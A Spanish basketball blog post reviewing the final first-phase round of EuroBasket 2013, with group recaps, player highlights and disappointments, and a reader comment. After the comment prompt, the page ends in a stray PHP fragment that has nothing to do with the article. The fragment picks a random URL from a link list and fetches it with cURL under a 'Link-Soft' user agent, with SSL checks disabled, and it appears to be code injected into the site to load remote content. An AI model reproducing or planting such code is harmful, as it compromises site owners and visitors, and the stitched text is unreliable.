EuroNBAsket 2013 – Jornada 5. Final de la primera fase

10 de September de 2013 por TheDeerHunter

Termina la primera fase y se van para casa las 12 peores selecciones. Os confesamos que se agradece la primera criba para subir el nivel medio de la competición, bastante discutible hasta la fecha. Por si no teníamos suficiente, en esta última jornada hubo un buen número de choques sin nada en juego carentes de cualquier tipo de tensión competitiva.

Grupo A: No fue el paseo en barca que preveíamos para Francia y es que tras el tropiezo inaugural contra Alemania pudo complicarse mucho la cosa. En cambio, el rendimiento de Ukrania ha sido más regular. Bélgica se cuela en la segunda liguilla con puntos de buen juego, pero con balance negativo.

Grupo B: Terrible. Bien ganado el apelativo de “Grupo de la muerte”. Bosnia y Herzegovina se va a casa habiendo perdido sólo dos partidos y con un nivel de juego sorprendentemente bueno. A Montenegro se le escapó la clasificación entre los dedos. Macedonia deslumbró en su única victoria ante Serbia pero terminó dejando una pobre imagen en medio de desagradables rumores de celebraciones que se escapan de las manos. Los clasificados (Serbia, Letonia y Lituania) lo merecen pero dejan muchas dudas.

Grupo C: España trituró a todos excepto a la anfitriona. Croacia no ha hecho más que ganar tras el baño español del primer día mientras que Slovenia se ha comportado a la inversa. Fue ganar a la vigente campeona y diluirse. Muy decepcionante Polonia y las buenas sensaciones de Georgia no se han traducido en resultados. La República Checa mejor de lo esperado, que no era mucho.

Grupo D: Deslumbrante Italia, único equipo invicto de la competición. Sorprendente Finlandia mientras que Grecia termina pasando casi por castigo, por la incomparecencia de Rusia y Turquía. Suecia de comparsa, como ya se sabía. 

DESTACADOS

Tony Parker: Extraordinario una vez más. 20 puntos, 6 asistencias, 3 rebotes. Lo malo es que en un partido intrascendente Francia necesite del mejor Parker para doblegar a Bélgica.

Boris Diaw: Partido muy completo. 12 puntos, 5 asistencias, 3 rebotes y 1 robo.

Mirza Teletovic: Se marcha con la cabeza alta. De menos a más demuestra que sigue siendo el mejor 4 de Europa y uno de los mejores artilleros del continente. Ayer, 31 puntazos, 7 rebotes, 1 tapón y 1 asistencia.

Linas Kleiza: Le sentó bien que el resultado fuera lo de menos. 20 puntos y 10 rebotes.

Ricky Rubio: Asombrosamente fino en ataque. Está con confianza y se traduce en sus dos mejores marcas de anotación con la selección, dos días consecutivos. Hoy no ha fallado ni un sólo tiro. 16 puntos, 5 rebotes, 3 asistencias en únicamente 18 minutos en pista por las rotaciones.

Marcin Gortat: Por fin pudimos ver a algo parecido a si mismo aunque no sirva de mucho a estas alturas. Al menos no se van con el casillero a 0. 19 puntos, 12 rebotes, 1 tapón y 1 asistencia. Éste debería haber sido su nivel habitual.

Omri Casspi: Notable despedida. Una lástima. Muchos esperaban este nivel más a menudo por parte del hebreo pero ha sido más bien al contrario. 22 puntos, 13 rebotes, 1 asistencia y un robo.

Jeff Taylor: Se despide del campeonato siendo el líder de puntos por partido y muy buen sabor de boca en lo individual. Protagonismo inversamente proporcional al nivel de exigencia de su selección goza de una libertad que en otras circunstancias no podría tener. Ayer 28 puntos, 7 rebotes, 1 robo.

Jonas Jerebko: También buen trabajo, más completo aunque sin tanto acierto ofensivo como su compañero. Ayer 21 puntos, 8 rebotes, 3 asistencias, 1 robo y 1 tapón.

DECEPCIONES

Luigi Datome: Muchas faltas y pocos minutos en pista. Su promedio anotador volvió a caer con sólo 7 puntos, más 3 rebotes y 1 asistencia.

Goran Dragic: 9 puntos y 2 robos. Insuficiente para un jugador de su categoría.

Nemanja Nedovic: No se jugaban nada pero no es excusa. Intrascendente en los 22 minutos que estuvo en cancha. Porcentajes malos y muchas pérdidas. 5 puntos, 2 rebotes, 2 asistencias y un robo.

Valanciunas&Montijunas: Entendemos y respetamos las rotaciones pero nos gusta verles en acción. En el caso del segundo no creemos que sea por el desgaste acumulado…

Omer Asik: Cubriéndose de gloria para cerrar un campeonato lamentable. 2 puntos, 4 rebotes, 1 asistencia y 1 robo para la competencia de Dwight Howard en Houston.

Comenta

Un comentario a esta entrada

  1. Simon dice:
    #1

    Ricky está espectacular, a ver si esa mejoría notoría en el tiro y en la agresividad que hemos visto en la primera fase se mantiene cuando empiecen los partidos calientes…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>